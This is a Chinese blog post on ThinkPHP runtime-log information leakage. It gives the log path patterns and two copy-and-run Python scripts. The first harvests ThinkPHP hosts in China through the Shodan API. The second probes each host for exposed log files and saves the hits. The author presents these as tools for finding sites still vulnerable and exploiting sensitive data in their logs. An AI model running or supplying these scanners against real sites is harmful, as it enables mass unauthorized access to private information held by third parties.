ThinkPHP信息泄露
2023-02-18 16:29:32 时间
昨天遇到了一个ThinkPHP日志泄露,然后我就写了个脚本利用shodan搜索批量的来找一下漏洞,估计已经被人撸完了,不过还有一些网站有着此漏洞。ip收集和漏洞验证脚本工具我会放在最下面,需要的直接复制运行就行。
漏洞信息:
1、ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关
2、ThinkPHP默认安装后,也会在Runtime目录下生成日志
THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log
THINKPHP3.1结构:Runtime\Logs\Home\16_09_09.log
日志存储结构是 :项目名\Runtime\Logs\Home\年份_月份_日期.log
例如,某个大学的日志泄露 ,里面可能存在着敏感信息,这就需要我们自己寻找和利用
ip收集脚本编写:
import shodan api = shodan.Shodan('api') # 写你自己shodan的api def Findip(): print('收集ip开始') try: f = open(r'ThinkPHP.txt', 'a+') results = api.search("thinkphp country:'CN'") #如果修改搜索的内容请注意符号 print("一共找到:%s" % results['total']) for result in results['matches']: url = result['ip_str'] + ":" + str(result['port']) print(url) f.write("http://" + url) f.write("\n") f.close() print('ip收集完毕') except shodan.APIError as e: print("end:%s" % e) Findip()
漏洞验证:将ThinkPHP.txt 和此py放同一目录
import time import requests def run(): payload_o = '/App/Runtime/Logs/22_03_29.log' payload_t = '/Runtime/Logs/Home/22_03_29.log' print("最后的结果保存在vlun.txt") for ip in open('ThinkPHP.txt'): # 把换行利用正则换成空格 ip = ip.replace('\n', '') ip1 = ip + payload_o ip2 = ip + payload_t print("当前ip",ip) # 容错处理 try: vlun_o = requests.get(ip1).status_code vlun_t = requests.get(ip2).status_code if vlun_o == 200: print('find it->' + ip1 + '状态码为:' + str(vlun_o)) with open(r'T1.txt', 'a+', encoding='utf-8') as f: f.write(ip1 + '\n') f.close() if vlun_t == 200: print('find it->' + ip2 + '状态码为:' + str(vlun_t)) with open(r'T1.txt', 'a+', encoding='utf-8') as f: f.write(ip2 + '\n') f.close() time.sleep(0.5) except Exception as e: pass run()
存在200即有可能存在日志泄露
不懂shodan编程的可以看 撒旦API使用指南
相关文章
- 使用chatGPT写一篇关于在线客服系统的博客-在线客服系统:快速解决客户问题的利器
- 在wordpress开发的网站中添加在线客服咨询功能代码教程
- 中英双语多语言外贸企业网站源码系统 - HanCMS - 安装部署教程
- 浏览器扩展开发系列教程(一)
- Chrome 将 Notification.requestPermission() 的“default”结果视为“dennied”
- 在线客服系统源码开发实战总结:渐变色效果的实际运用效果
- 在线客服系统源码开发实战总结:官网首页视频大背景循环播放效果实现
- 在线客服系统源码开发实战总结:需求分析及前端代码基本技术方案
- 在线客服系统源码(外贸多语言带翻译网页在线客服系统源码完整搭建)
- 前端vue2下使用media query 媒体查询报错问题
- vue2搭配vue-router3真正可用不报错的写法格式
- wordpress跨境电商外贸独立站安装WooCommerce插件
- wordpress独立网站域名解析教程
- obs直播录屏软件下载使用教程-制作短视频录制视频教程
- wordpress独立站菜单导航设置教程
- wordpress外贸跨境电商独立站WooCommerce插件安装教程
- wordpress编辑器增加粘贴图片上传服务器教程
- wordpress网站主题安装教程
- 多语言在线客服系统源码-自动识别中英环境-私有化部署完美支持跨境电商网站
- wordpress企业网站搭建教程